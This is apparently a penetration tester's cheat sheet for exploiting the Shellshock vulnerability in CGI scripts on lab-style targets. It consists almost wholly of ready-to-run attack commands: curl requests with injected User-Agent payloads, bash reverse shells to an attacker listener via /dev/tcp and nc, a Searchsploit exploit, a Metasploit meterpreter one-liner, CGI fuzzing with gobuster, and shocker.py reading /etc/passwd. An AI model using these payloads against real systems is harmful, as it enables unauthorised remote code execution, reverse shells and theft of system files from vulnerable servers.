/cgi-bin Shellshock

#NMAP

ls -lah /usr/share/nmap/scripts/shellshock
sudo nmap 10.11.1.71 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi --script-args uri=/cgi-bin/admin.cgi

#Curl POC to check whether target is vulnerable

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.10.10/cgi-bin/test/test.cgi

#Variant

curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi

#Curl revshell (Kali $ip 10.10.10.10)

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.55.200/443 0>&1' http://192.168.55.87/cgi-bin/test/test.cgi

nc -nvlp 443

Variant : (kali 192.168.119.177)

curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >& /dev/tcp/192.168.119.177/443 0>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'

#Searchsploit https://www.exploit-db.com/exploits/34900 [1]sudo searchsploit -m linux/remote/34900.py Examples: ./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234 ./exploit.py payload=bind rhost=1.2.3.4 rport=1234 [2] Get a pseudo-shell (unstable) ./34900.py payload=reverse rhost=192.168.101.171 lhost=192.168.101.160 lport=1234 pages=/cgi-bin/test Variant: ./exploit.py payload=reverse rhost=10.11.1.71 lhost=192.168.119.177 lport=443 pages=/cgi-bin/test.cgi,/cgi-bin/admin.cgi [3]From initial pseudoshell, send another bash reverse shell back to kali, make sure you select a different port (quad 4) bash -i >& /dev/tcp/192.168.101.160/4444 0>&1 [4]Catch the connection back on kali nc -nvlp 4444

#Fuzzing using gobuster

gobuster dir -u http://10.11.1.39 -x cgi,sh -s "301,302,304,307" -b "" -k -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt

#Metasploit

msfconsole -q -x "use exploit/multi/http/apache_mod_cgi_bash_env_exec; set RHOST 10.11.1.71; set TARGETURI /cgi-bin/admin.cgi; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.119.177; set LPORT 443; run;"

#shocker

#git clone 
https://github.com/nccgroup/shocker

./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose